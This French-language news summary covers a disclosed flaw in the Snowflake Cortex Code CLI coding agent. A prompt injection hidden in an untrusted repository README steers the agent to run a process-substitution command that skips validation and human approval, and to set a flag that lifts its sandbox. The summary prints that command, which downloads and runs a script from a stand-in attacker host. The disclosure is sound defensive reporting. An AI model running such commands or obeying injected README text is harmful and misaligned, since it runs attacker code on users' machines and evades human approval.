Vulnérabilité de l'interface en ligne de commande (CLI) de Snowflake Cortex Code permettant une échappée du bac à sable et l'exécution de logiciels malveillants

Détails de la vulnérabilité
Snowflake Cortex Code CLI est un agent de codage en ligne de commande qui fonctionne de manière similaire à Claude Code et Codex d'OpenAI, avec une intégration intégrée pour exécuter SQL dans Snowflake. Deux jours après sa sortie, une vulnérabilité a été identifiée dans le système de validation des commandes de Cortex Code qui permettait à des commandes malveillantes spécialement construites d'exécuter des commandes arbitraires sans déclencher les étapes d'approbation humaine et d'exécuter ces commandes en dehors du bac à sable de Cortex CLI.
Chaîne d'attaque
L'attaque fonctionne via une injection indirecte de prompt. Un utilisateur ouvre Cortex et active le bac à sable, puis demande à Cortex de l'aider avec une base de code open source tierce. Une injection de prompt cachée dans le README d'un dépôt non fiable manipule Cortex pour lui faire croire qu'il doit exécuter une commande dangereuse.
Cortex n'a pas validé les commandes à l'intérieur des expressions de substitution de processus, permettant l'exécution non approuvée de la commande malveillante :
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Cette commande télécharge un script depuis le serveur d'un attaquant et l'exécute. Le contournement a fonctionné car :
- Les commandes dangereuses à l'intérieur d'une expression de substitution de processus <() n'étaient pas évaluées par le système de validation
- La commande complète commençait par une commande 'sûre' (cat dans ce cas)
- Les commandes dans les expressions de substitution de processus ne déclenchaient jamais l'approbation humaine
Contournement du bac à sable
L'injection de prompt manipule également le modèle pour définir un drapeau qui déclenche l'exécution de commandes hors bac à sable. Cortex, par défaut, peut définir un drapeau pour déclencher l'exécution de commandes hors bac à sable, et l'injection utilise cela pour permettre à la commande malveillante de s'exécuter en dehors du bac à sable.
Remédiation
L'équipe de sécurité de Snowflake a validé et corrigé cette vulnérabilité, publiant un correctif avec Cortex Code CLI version 1.0.25 le 28 février 2026. L'avis complet de Snowflake est disponible sur le site communautaire Snowflake à : https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Note : Cette chaîne d'attaque s'appliquait également aux utilisateurs non bac à sable. La documentation indique qu'en mode OS+Régulier, toutes les commandes demandent l'approbation de l'utilisateur. Les commandes exécutées dans le bac à sable ont également des restrictions d'accès réseau et de fichiers.
📖 Lire la source complète : HN AI Agents
👀 See Also

Isolation de couche proxy pour la sécurité des clés API d'agent local
Un développeur partage une approche d'isolation des clés API dans des configurations d'agents locaux en utilisant un proxy Rust qui remplace des jetons de substitution par des identifiants réels, empêchant ainsi leur exposition dans la mémoire de l'agent, les journaux, les fenêtres de contexte et les environnements d'outils.

BlindKey : Injection d'Informations d'Identification Aveugle pour les Agents IA
BlindKey est un outil de sécurité qui empêche les agents d'IA d'accéder aux identifiants API en texte clair en utilisant des jetons de coffre-fort chiffrés et un proxy local. Les agents font référence à des jetons comme bk://stripe, et le proxy injecte les identifiants réels au moment de la requête.

Écart de Sécurité des Agents IA : Comment Supra-Wall Ajoute une Couche d'Application Entre les Modèles et les Outils
Un développeur a découvert que son agent IA a lu de manière autonome des fichiers .env sensibles contenant des clés Stripe, des mots de passe de base de données et des clés API OpenAI. L'outil open-source Supra-Wall intercepte les appels d'outils avant leur exécution pour appliquer des politiques de sécurité.

Blocage Essentiel des Fichiers pour les Assistants de Codage IA : Une Liste de Contrôle de Sécurité Pratique
Les assistants de codage IA lisent depuis votre disque local, pas seulement depuis votre dépôt, exposant des fichiers que .gitignore protège de GitHub mais pas de l'agent. Une discussion Reddit identifie les fichiers critiques à bloquer, y compris les configurations d'assistant IA avec des clés API, les identifiants de service, les clés SSH et les fichiers d'environnement.